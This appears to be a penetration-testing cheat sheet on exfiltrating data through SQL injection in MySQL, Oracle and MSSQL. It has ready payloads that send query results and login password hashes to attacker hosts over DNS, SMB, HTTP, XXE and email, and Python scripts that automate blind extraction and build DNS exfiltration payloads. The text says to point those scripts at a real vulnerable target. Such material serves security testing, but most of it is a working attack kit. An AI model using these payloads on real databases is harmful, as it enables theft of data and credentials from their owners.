Data Exfiltration (MySQL)

Exfiltrating data allows easier data analysis, as well as an offline copy of any compromised data. Data can be exfiltrated through files, various layer 4 requests, and hidden techniques.

* Requires a privileged user: LOAD_FILE and INTO OUTFILE need the FILE privilege, the target path must be allowed by secure_file_priv, and the UNC-path variants only work when the MySQL server runs on Windows.

Description / Query

DNS Request *
  SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), '.yourhost.com\\'))
  The subquery must return exactly one value made of hostname-safe characters. MySQL unescapes '\\\\' to \\ and the trailing '\\' to \, so the server resolves <value>.yourhost.com while trying to open the UNC path; the file read itself can fail, the DNS lookup has already happened.

SMB Share *
  SELECT * FROM USERS INTO OUTFILE '\\\\attacker\\SMBshare\\output.txt'
  Backslashes must be doubled inside the MySQL string literal. The server writes the file as its own service account, so the share has to be writable by that account (or anonymously).

HTTP Server *
  SELECT * FROM USERS INTO OUTFILE '/var/www/html/output.txt'
  Works when the MySQL process can write to the web root; the file is then fetched over HTTP. INTO OUTFILE refuses to overwrite an existing file, so pick a fresh name each time.

Numeric Concatenation
  SELECT length(user())
  SELECT ASCII(substr(user(),N,1))
  N is the 1-based character position; run the second query once per position.

When data can only be exported as numbers (an integer column, a count, a numeric error message), fetch the length first, then the ASCII code of each character, and reassemble the string client-side. This is tedious by hand and is normally scripted.
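The numeric extraction above scripted end to end, as an added example that is not part of the NetSPI page. The `query` and `oracle` callbacks stand in for whatever channel the injection gives you (a function that sends one statement and returns the leaked integer or boolean); `_fake_db` and `_fake_bool_db` are constructed stand-ins for a MySQL server whose user() is "root@localhost". The boolean variant goes beyond the page: it recovers the same string over a true/false-only (blind) channel by binary-searching each value.

```python
"""Automate length + ASCII(substr()) extraction over a numeric or boolean channel."""
import re
from typing import Callable

_SECRET = "root@localhost"  # constructed sample: what user() returns on the fake server


def extract_string(expr: str, query: Callable[[str], int]) -> str:
    """Recover the text value of a MySQL expression (e.g. user()) when every
    request can only return one integer: first its length, then the ASCII
    code of each 1-based character position via ASCII(substr(expr, i, 1))."""
    length = query(f"SELECT length({expr})")
    return "".join(
        chr(query(f"SELECT ASCII(substr({expr},{i},1))")) for i in range(1, length + 1)
    )


def _bsearch(greater_than: Callable[[int], bool], lo: int, hi: int) -> int:
    """Find an unknown integer in [lo, hi] given only 'value > n' answers."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_string_boolean(expr: str, oracle: Callable[[str], bool], max_len: int = 255) -> str:
    """Same recovery when the channel is only true/false (blind injection):
    binary-search the length and then every ASCII code, ~8 requests per character."""
    length = _bsearch(lambda n: oracle(f"SELECT length({expr})>{n}"), 0, max_len)
    out = []
    for i in range(1, length + 1):
        code = _bsearch(lambda n: oracle(f"SELECT ASCII(substr({expr},{i},1))>{n}"), 0, 255)
        out.append(chr(code))
    return "".join(out)


def _fake_db(sql: str) -> int:
    """Constructed stand-in for a MySQL server answering the two query shapes above."""
    if re.fullmatch(r"SELECT length\(user\(\)\)", sql):
        return len(_SECRET)
    m = re.fullmatch(r"SELECT ASCII\(substr\(user\(\),(\d+),1\)\)", sql)
    if m:
        return ord(_SECRET[int(m.group(1)) - 1])
    raise ValueError("unsupported query: " + sql)


def _fake_bool_db(sql: str) -> bool:
    """Constructed stand-in for a blind channel: only '<expression> > n' comparisons."""
    m = re.fullmatch(r"(SELECT .*)>(\d+)", sql)
    if not m:
        raise ValueError("unsupported query: " + sql)
    return _fake_db(m.group(1)) > int(m.group(2))


if __name__ == "__main__":
    print(extract_string("user()", _fake_db))
    print(extract_string_boolean("user()", _fake_bool_db))
```

To use it against a real target, replace the fake callbacks with a function that injects the statement into the vulnerable request and parses the number (or the true/false page difference) out of the response; the extraction logic itself does not change.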

Data Exfiltration (Oracle)

* Requires a privileged user: UTL_HTTP needs a network ACL grant on current releases; the other entries run with ordinary query privileges.

Description / Query

Combine multiple rows into one value
  SELECT dbms_xmlgen.getxmltype('select user from dual') FROM dual
  Returns the whole result set as a single XML document (a <ROWSET> with one <ROW> per row), so multi-row output fits through a channel that only returns one value.

XML External Entity
  SELECT xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://IP/test"> %remote; %param1;]>') FROM dual;
  Parsing the document makes the database fetch http://IP/test; the DTD served there defines %param1 and can carry data back to the attacker in a further request. Oracle has since patched this, so it only works on unpatched instances.

UTL_HTTP Request (Pre-11gR2) *
  SELECT UTL_HTTP.request ('http://IP/test') FROM dual;
  On later releases the call fails with ORA-24247 unless a network ACL grants the current user access to the target host.

Escaping special characters
  SELECT UTL_URL.escape('http://IP/' || USER) FROM dual;
  URL-encode query output before appending it to a UTL_HTTP request so that spaces and reserved characters do not break the URL.

Data Exfiltration (MSSQL)

Note: It is possible to make a DNS request from MSSQL through the extended stored procedures that accept a UNC path (xp_dirtree, xp_fileexist); these are executable by members of public by default, so the lookup itself needs no elevated privileges. The login-hash example below additionally needs the rights to read password_hash from sys.sql_logins (CONTROL SERVER, effectively sysadmin); sys.sql_logins and fn_varbintohexstr exist from SQL Server 2005 onward.

Description / Query

Make DNS Request (leak login hashes)
  DECLARE @host varchar(800);
  select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;
  exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');
  The doubled single quotes build the literal '\\<host>\c$\boot.ini' inside the dynamic SQL. As written the SELECT leaves only the last login row in @host, and a label longer than 63 characters (a login name plus a full hash) is not a valid DNS name and may never leave the host, so in practice you loop over the logins and split the hex into several labels.

UNC Path (DNS Request)
  xp_dirtree '\\data.domain.com\file'
  Resolving data.domain.com is the DNS request. If the name resolves, the SQL Server service account also tries to authenticate to the SMB share, so the same call hands its Net-NTLM hash to an SMB capture listener.

See also NetSPI's UNC Path Injection Cheatsheet.

Enable sp_send_dbmail and send query results
  sp_configure 'show advanced options', 1;
  RECONFIGURE;
  sp_configure 'Database Mail XPs', 1;
  RECONFIGURE;
  exec msdb..sp_send_dbmail @recipients='harold@netspi.com', @query='select @@version';
  sp_configure needs the ALTER SETTINGS permission (sysadmin or serveradmin). Sending also needs a working Database Mail profile (pass @profile_name if no default profile exists) and membership in msdb's DatabaseMailUserRole.

The xp_sendmail entries below use SQL Mail, which was deprecated in SQL Server 2005 and removed in SQL Server 2012, so they only apply to older instances that have SQL Mail configured.

Basic xp_sendmail Query
  EXEC master..xp_sendmail 'harold@netspi.com', 'This is a test.'

Send Full Email with xp_sendmail
  EXEC xp_sendmail @recipients='harold@netspi.com',
      @message='This is a test.',
      @copy_recipients='test@netspi.com',
      @subject='TEST'

Send Query Results Via xp_sendmail
  EXEC xp_sendmail 'harold@netspi.com', @query='SELECT @@version';

Send Query Results as Attachment Via xp_sendmail
  CREATE TABLE ##texttab (c1 text)
  INSERT ##texttab values ('Put message here.')
  DECLARE @cmd varchar(56)
  SET @cmd = 'SELECT c1 from ##texttab'
  EXEC master.dbo.xp_sendmail 'robertk',
      @query = @cmd, @no_header='TRUE'
  DROP TABLE ##texttab
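The DNS out-of-band technique behind the MySQL LOAD_FILE entry and the MSSQL xp_fileexist / xp_dirtree entries, worked through as an added example that is not NetSPI's code. It generates the server-side payloads (hex-encoded, split into labels under the 63-character DNS limit, numbered so the listener can reorder them) and decodes the captured query names on the attacker's side. Assumptions: the attacker controls the domain (evil.example.com below is constructed) and sees queries for it; the share name x and the 60-hex-character chunk size are arbitrary choices; the sample bytes are constructed.

```python
"""DNS out-of-band exfiltration helpers for the LOAD_FILE (MySQL) and
xp_dirtree / xp_fileexist (MSSQL) entries on this page."""
from typing import Iterable

LABEL_HEX = 60            # hex characters per DNS label (the limit is 63)
LABEL_BYTES = LABEL_HEX // 2


def mysql_dns_payload(inner_query: str, domain: str, max_bytes: int = 90) -> str:
    """One MySQL SELECT that carries up to max_bytes of a single-value subquery
    result in the hostname of a UNC path (<hex>.<hex>...<hex>.0.<domain>).
    Needs the FILE privilege and a Windows MySQL host. Empty labels from a
    short result are dropped by NULLIF/CONCAT_WS so the name stays valid.
    The SQL literals carry doubled backslashes because MySQL unescapes them."""
    labels = [
        f"NULLIF(HEX(SUBSTRING(({inner_query}),{start},{LABEL_BYTES})),'')"
        for start in range(1, max_bytes + 1, LABEL_BYTES)
    ]
    host = "CONCAT_WS('.'," + ",".join(labels) + f",'0','{domain}')"
    return r"SELECT LOAD_FILE(CONCAT('\\\\'," + host + r",'\\'))"


def mssql_dns_payload(inner_query: str, domain: str) -> str:
    """T-SQL batch: hex-encode a single-value result with fn_varbintohexstr,
    split it into labels and issue one xp_dirtree per chunk as
    <hex>.<seq>.<domain>. xp_dirtree is executable by public by default;
    swap the EXEC line for xp_fileexist if that is what is reachable.
    T-SQL literals keep backslashes as they are, so nothing is doubled here."""
    return "\n".join([
        "DECLARE @h varchar(8000), @p varchar(300), @i int, @n int;",
        f"SELECT @h = SUBSTRING(master.sys.fn_varbintohexstr(CAST(({inner_query}) AS varbinary(8000))), 3, 8000);",
        "SET @i = 1; SET @n = 0;",
        "WHILE @i <= LEN(@h)",
        "BEGIN",
        rf"  SET @p = '\\' + SUBSTRING(@h, @i, {LABEL_HEX}) + '.' + CAST(@n AS varchar(10)) + '.{domain}\x';",
        "  EXEC master..xp_dirtree @p;",
        f"  SET @i = @i + {LABEL_HEX}; SET @n = @n + 1;",
        "END",
    ])


def simulate_dns_names(data: bytes, domain: str) -> list[str]:
    """Constructed locally: the query names the listener would see once the
    MSSQL batch above has run for `data` (one label per name, numbered)."""
    h = data.hex()
    return [f"{h[i:i + LABEL_HEX]}.{i // LABEL_HEX}.{domain}"
            for i in range(0, len(h), LABEL_HEX)]


def decode_dns_names(names: Iterable[str], domain: str) -> bytes:
    """Listener side: reassemble bytes from names shaped
    <hex>[.<hex>...].<seq>.<domain>. Resolvers retry and may randomise
    letter case, so everything is lowercased and only the first copy of each
    sequence number is kept; names that do not fit the shape are ignored."""
    suffix = "." + domain.lower().rstrip(".")
    chunks: dict[int, str] = {}
    for name in names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        labels = name[: -len(suffix)].split(".")
        payload = "".join(labels[:-1])
        if len(labels) < 2 or not labels[-1].isdigit() or not payload:
            continue
        if any(c not in "0123456789abcdef" for c in payload):
            continue
        chunks.setdefault(int(labels[-1]), payload)
    return bytes.fromhex("".join(chunks[k] for k in sorted(chunks)))


if __name__ == "__main__":
    sample = b"sa-0x0200a1b2c3d4"   # constructed stand-in for a login name + hash
    print(mysql_dns_payload("SELECT user()", "evil.example.com"))
    print(mssql_dns_payload("SELECT TOP 1 password_hash FROM sys.sql_logins", "evil.example.com"))
    print(decode_dns_names(simulate_dns_names(sample, "evil.example.com"), "evil.example.com"))
```

Keep the whole hostname under 253 characters when raising max_bytes for the MySQL variant, and remember that an nvarchar result cast to varbinary arrives as UTF-16-LE bytes, so decode the recovered bytes accordingly.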

© 2023 Copyright by NetSPI. All rights reserved.